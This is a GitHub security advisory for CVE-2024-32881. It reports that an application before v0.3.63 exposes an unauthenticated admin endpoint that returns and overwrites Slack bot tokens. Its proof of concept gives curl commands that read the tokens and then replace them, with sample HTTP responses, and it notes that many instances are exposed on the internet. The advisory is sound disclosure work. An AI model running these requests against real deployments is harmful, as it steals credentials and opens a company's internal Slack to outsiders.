Skip to content

Unauth GET/SET of Slack Bot Tokens

Critical
yuhongsun96 published GHSA-xr9w-3ggr-hr6j Apr 24, 2024

Package

No package listed

Affected versions

< v0.3.63

Patched versions

v0.3.63

Description

Summary

Unauth GET/SET of Slack Bot Tokens, anyone with network access can steal slack bot tokens, and set some. This implies full compromise of the customer's slack bot, leading to scary internal slack access... 😓

FYI, many instances (quick shodan scan) are already vulnerable to this

Details & PoC

alias crli='curl -sSkiL'
crli https://127.0.0.1/api/manage/admin/slack-bot/tokens | jq
crli https://127.0.0.1/api/manage/admin/slack-bot/tokens -X PUT -H 'Content-Type: application/json' --data-binary '{"app_token": "aaaa", "bot_token": "aaaa"}'
crli https://127.0.0.1/api/manage/admin/slack-bot/tokens | jq

# crli https://127.0.0.1/api/manage/admin/slack-bot/tokens | jq
# HTTP/2 404 
# date: Mon, 08 Apr 2024 10:34:16 GMT
# content-type: application/json
# content-length: 28
# server: istio-envoy
# x-envoy-upstream-service-time: 3
# 
# {
#   "detail": "No tokens found"
# }

# crli https://127.0.0.1/api/manage/admin/slack-bot/tokens | jq
# HTTP/2 200 
# date: Mon, 08 Apr 2024 10:34:18 GMT
# content-type: application/json
# content-length: 39
# server: istio-envoy
# x-envoy-upstream-service-time: 5
# 
# {
#   "bot_token": "aaaa",
#   "app_token": "aaaa"
# }

Impact

"Pretty big impact" aka "Slack access from WWW" aka "We're f*ed!"

Note

I checked and it seems that there's no path from ARBITRARY TOKENS SET to ADMIN XSS, which is nice as there are way more critical issues in the admin side, more on this in the next issue!

Have a nice day! 🌹

Severity

Critical

CVE ID

CVE-2024-32881

Weaknesses

No CWEs

Credits